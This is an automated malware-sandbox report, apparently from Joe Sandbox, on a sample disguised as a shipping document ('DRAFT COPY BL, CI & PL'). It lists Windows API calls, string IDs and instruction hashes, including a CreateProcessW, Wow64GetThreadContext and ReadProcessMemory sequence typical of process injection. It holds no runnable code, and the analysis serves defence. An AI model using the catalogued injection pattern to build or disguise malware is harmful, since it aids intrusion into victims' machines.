                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                • String ID:
                                                                • API String ID: 1552873950-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                • String ID:
                                                                • API String ID: 2782032738-0
                                                                APIs
                                                                • _memset.LIBCMT ref: 009344CF
                                                                  • Part of subcall function 0093407C: _memset.LIBCMT ref: 009340FC
                                                                  • Part of subcall function 0093407C: _wcscpy.LIBCMT ref: 00934150
                                                                  • Part of subcall function 0093407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00934160
                                                                • KillTimer.USER32(?,00000001,?,?), ref: 00934524
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00934533
                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0096D4B9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                • String ID:
                                                                • API String ID: 1378193009-0
                                                                APIs
                                                                • _memset.LIBCMT ref: 0096EA39
                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0096EA83
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                  • Part of subcall function 00950791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009507B0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                • String ID: X
                                                                • API String ID: 3777226403-3081909835
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 009998F8
                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0099990F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Temp$FileNamePath
                                                                • String ID: aut
                                                                • API String ID: 3285503233-3010740371
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                APIs
                                                                • _memset.LIBCMT ref: 00934370
                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00934415
                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00934432
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconNotifyShell_$_memset
                                                                • String ID:
                                                                • API String ID: 1505330794-0
                                                                APIs
                                                                • __FF_MSGBANNER.LIBCMT ref: 00955733
                                                                  • Part of subcall function 0095A16B: __NMSG_WRITE.LIBCMT ref: 0095A192
                                                                  • Part of subcall function 0095A16B: __NMSG_WRITE.LIBCMT ref: 0095A19C
                                                                • __NMSG_WRITE.LIBCMT ref: 0095573A
                                                                  • Part of subcall function 0095A1C8: GetModuleFileNameW.KERNEL32(00000000,009F33BA,00000104,?,00000001,00000000), ref: 0095A25A
                                                                  • Part of subcall function 0095A1C8: ___crtMessageBoxW.LIBCMT ref: 0095A308
                                                                  • Part of subcall function 0095309F: ___crtCorExitProcess.LIBCMT ref: 009530A5
                                                                  • Part of subcall function 0095309F: ExitProcess.KERNEL32 ref: 009530AE
                                                                  • Part of subcall function 00958B28: __getptd_noexit.LIBCMT ref: 00958B28
                                                                • RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000000,?,?,?,00950DD3,?), ref: 0095575F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                • String ID:
                                                                • API String ID: 1372826849-0
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00999548,?,?,?,?,?,00000004), ref: 009998BB
                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00999548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009998D1
                                                                • CloseHandle.KERNEL32(00000000,?,00999548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009998D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleTime
                                                                • String ID:
                                                                • API String ID: 3397143404-0
                                                                APIs
                                                                • _free.LIBCMT ref: 00998D1B
                                                                  • Part of subcall function 00952D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00959A24), ref: 00952D69
                                                                  • Part of subcall function 00952D55: GetLastError.KERNEL32(00000000,?,00959A24), ref: 00952D7B
                                                                • _free.LIBCMT ref: 00998D2C
                                                                • _free.LIBCMT ref: 00998D3E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CALL
                                                                • API String ID: 0-4196123274
                                                                • Opcode ID: 881069a45a7204ad4ec4b5c433e8385afd48a37722d93d40b7354dfaa68aa211
                                                                • Instruction ID: 371b364b5810a7b4b9330724412bb30707c02d9b0bb37f670125216306be3aca
                                                                • Opcode Fuzzy Hash: 881069a45a7204ad4ec4b5c433e8385afd48a37722d93d40b7354dfaa68aa211
                                                                • Instruction Fuzzy Hash: 16224471608301DFCB24DF24C494B6ABBE5BF89304F15896DE89A9B262D735EC45CF82
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID: EA06
                                                                • API String ID: 4104443479-3962188686
                                                                • Opcode ID: 503d321407dc18c0e044f45dd9742f12fca82ee22ace8c3b24c67a764d696d11
                                                                • Instruction ID: 68a9f52713ab42ea0a86741714e5dfeafec6482b18189a845b40b94bf927148a
                                                                • Opcode Fuzzy Hash: 503d321407dc18c0e044f45dd9742f12fca82ee22ace8c3b24c67a764d696d11
                                                                • Instruction Fuzzy Hash: 7B419D31A041585BCF219B64CC517BE7FA6DF86300F6A4475EC92DB2C2D624BD848FA1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: 90bd321d2d4002fe64be31f1e07dedb99f9dafd3dbe204682925cf71906d1429
                                                                • Instruction ID: e22a6dd7233704651cf12ed51dfae2775780911b45ace26e8ae3909af5983f13
                                                                • Opcode Fuzzy Hash: 90bd321d2d4002fe64be31f1e07dedb99f9dafd3dbe204682925cf71906d1429
                                                                • Instruction Fuzzy Hash: AC31B8F1604606AFC714DFA8D8D1E69F3A9FF88310B158629E919CB391EB34E914CF90
                                                                APIs
                                                                  • Part of subcall function 0095571C: __FF_MSGBANNER.LIBCMT ref: 00955733
                                                                  • Part of subcall function 0095571C: __NMSG_WRITE.LIBCMT ref: 0095573A
                                                                  • Part of subcall function 0095571C: RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000000,?,?,?,00950DD3,?), ref: 0095575F
                                                                • std::exception::exception.LIBCMT ref: 00950DEC
                                                                • __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                  • Part of subcall function 0095859B: RaiseException.KERNEL32(?,?,?,009E9E78,00000000,?,?,?,?,00950E06,?,009E9E78,?,00000001), ref: 009585F0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 3902256705-0
                                                                • Opcode ID: d301c18c2298dc5783b999cf1181f9561ea4510ed742ab45333b110bb9c11284
                                                                • Instruction ID: de7e0a0a67f639919396b1cdc6593c296ee0ff404e9342c823ce55fd2cea596f
                                                                • Opcode Fuzzy Hash: d301c18c2298dc5783b999cf1181f9561ea4510ed742ab45333b110bb9c11284
                                                                • Instruction Fuzzy Hash: EDF0813190431A66DB20FB96EC06BDF77AC9F91352F104869FD08A6191DF719A8887D1
                                                                APIs
                                                                  • Part of subcall function 00958B28: __getptd_noexit.LIBCMT ref: 00958B28
                                                                • __lock_file.LIBCMT ref: 009553EB
                                                                  • Part of subcall function 00956C11: __lock.LIBCMT ref: 00956C34
                                                                • __fclose_nolock.LIBCMT ref: 009553F6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                • String ID:
                                                                • API String ID: 2800547568-0
                                                                • Opcode ID: 3ea41c997b8b69f03f18cb0c7c3f8fe5c2ebb1673622afd1b89a1864d806637d
                                                                • Instruction ID: 326bf34b989e18921e680f8f00ac8b952afdb6233c821b88fad79d9923062520
                                                                • Opcode Fuzzy Hash: 3ea41c997b8b69f03f18cb0c7c3f8fe5c2ebb1673622afd1b89a1864d806637d
                                                                • Instruction Fuzzy Hash: 56F09631800A04DAD711FF6798127AE76E46F81377F228114AC68BB1D2CBFC49499B51
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 010D8073
                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010D8109
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010D812B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                • String ID:
                                                                • API String ID: 2438371351-0
                                                                • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                • Instruction ID: 96d856b0c6ab79d5d862c36da259b00118573fb3dc862bc7d1060b1f67c05212
                                                                • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                • Instruction Fuzzy Hash: 1212DE20E18658C6EB24DF64D8507DEB272EF68300F1090E9D14DEB7A4E77A4E81CB5A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: 0c914e3bb7f6756f813bb07983ad7a736a1ca4529dc994f532354f6af9be8d0c
                                                                • Instruction ID: 3731cbef154979ddf3275b91450b86bd99f6c225fbf0cabe5ac9f61df4a2e509
                                                                • Opcode Fuzzy Hash: 0c914e3bb7f6756f813bb07983ad7a736a1ca4529dc994f532354f6af9be8d0c
                                                                • Instruction Fuzzy Hash: 5C31A1B9208A02DFC728DF99C091A21F7A4FF49310B14C569F98A8B795E730E841CF85
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction ID: 82f67df07ad191abdd5fbd4b5a72972d9c704412bae57a498aa3fcc15706c11b
                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction Fuzzy Hash: 5331D770A001059BC718DF5AC484969F7A6FF9A302B6887A5E88ACF351D731EDC5DBC0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClearVariant
                                                                • String ID:
                                                                • API String ID: 1473721057-0
                                                                • Opcode ID: 27707938342d1cba611f758408d27271d8fd50015fbdc90df85169cb3a4ca9fb
                                                                • Instruction ID: 170ff3cfde83edf31b92aa996535c972b1e471f7ad92693ee2d36b63134e041c
                                                                • Opcode Fuzzy Hash: 27707938342d1cba611f758408d27271d8fd50015fbdc90df85169cb3a4ca9fb
                                                                • Instruction Fuzzy Hash: 1A4105746083418FDB24DF14C454B1ABBE5BF85318F1988ACE9998B362C772EC49CF52
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: bcbcce42c06b6b59476f5f1fbe4b06b9338fca74c9a5361d5f97f5ad378e9633
                                                                • Instruction ID: 9b0dc1219e386783de1883eaa590bedeb151eca124fc1b659b561b21fb1faa48
                                                                • Opcode Fuzzy Hash: bcbcce42c06b6b59476f5f1fbe4b06b9338fca74c9a5361d5f97f5ad378e9633
                                                                • Instruction Fuzzy Hash: 20217FB2614A09EBDB208F55EC8176DBBB8FF54350F21842DE8C5C91A0EB34C4D0DB41
                                                                APIs
                                                                  • Part of subcall function 00934BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00934BEF
                                                                  • Part of subcall function 0095525B: __wfsopen.LIBCMT ref: 00955266
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00934E0F
                                                                  • Part of subcall function 00934B6A: FreeLibrary.KERNEL32(00000000), ref: 00934BA4
                                                                  • Part of subcall function 00934C70: _memmove.LIBCMT ref: 00934CBA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                • String ID:
                                                                • API String ID: 1396898556-0
                                                                • Opcode ID: 06d79556df8ee2a50928b9f01dd537c5ed748ea64eab7dc9f7193e5635dce4f7
                                                                • Instruction ID: 78a8528de13375eff29bf2f4774c70289916c090062d62565567f9e67745d5a0
                                                                • Opcode Fuzzy Hash: 06d79556df8ee2a50928b9f01dd537c5ed748ea64eab7dc9f7193e5635dce4f7
                                                                • Instruction Fuzzy Hash: 3611E331600205ABCF24EF74CC16FAE77A8EFC4710F118829F555AB281DA75AA009F90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClearVariant
                                                                • String ID:
                                                                • API String ID: 1473721057-0
                                                                • Opcode ID: 372f7a232e5b54307f8e302a3eab89fd4e2de830d28135a3cd34e422fafaeb74
                                                                • Instruction ID: 31b6596136063133c00ee61177016fc5373691348291b06a25aa9f73c34f89d8
                                                                • Opcode Fuzzy Hash: 372f7a232e5b54307f8e302a3eab89fd4e2de830d28135a3cd34e422fafaeb74
                                                                • Instruction Fuzzy Hash: BE210274908301DFCB14DF64C444B1ABBE5BF88315F058968F99A57762D731E809CF92
                                                                APIs
                                                                • __lock_file.LIBCMT ref: 009548A6
                                                                  • Part of subcall function 00958B28: __getptd_noexit.LIBCMT ref: 00958B28
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __getptd_noexit__lock_file
                                                                • String ID:
                                                                • API String ID: 2597487223-0
                                                                • Opcode ID: e60163ab1ef8a9b26b0fcc7a81ea8e7c07d39de2dff6f787f988f612882e8bc4
                                                                • Instruction ID: 63a75cb195dd42f56fc1e1b535759d4ace8cb1b810bb0cf45f4aaba7a362f26f
                                                                • Opcode Fuzzy Hash: e60163ab1ef8a9b26b0fcc7a81ea8e7c07d39de2dff6f787f988f612882e8bc4
                                                                • Instruction Fuzzy Hash: D6F0F431800604EBDF51EF628C063AF36A4AF4032BF004404BE14AA191CB788998DF41
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,?,009F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00934E7E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: e92143a91c5adbe87996de7eff66a93c8e836d0bc6dec0621ec2705e37520c83
                                                                • Instruction ID: 88065daee0a82324106a640d64c273ad99a1b89b0f4293c3260564257cf856c1
                                                                • Opcode Fuzzy Hash: e92143a91c5adbe87996de7eff66a93c8e836d0bc6dec0621ec2705e37520c83
                                                                • Instruction Fuzzy Hash: 76F03971505711CFCB349F64E898812BBE5BF5432A7228E7EE1DA86620C736A844DF40
                                                                APIs
                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009507B0
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LongNamePath_memmove
                                                                • String ID:
                                                                • API String ID: 2514874351-0
                                                                • Opcode ID: b1368c0fb087ea5c9d6521e532194d81e83edd2336ceac0d8bd491729a0b5e1f
                                                                • Instruction ID: 758d12b19a78b3cc2304235943982dad58b85489b31199ec236c62e50b656368
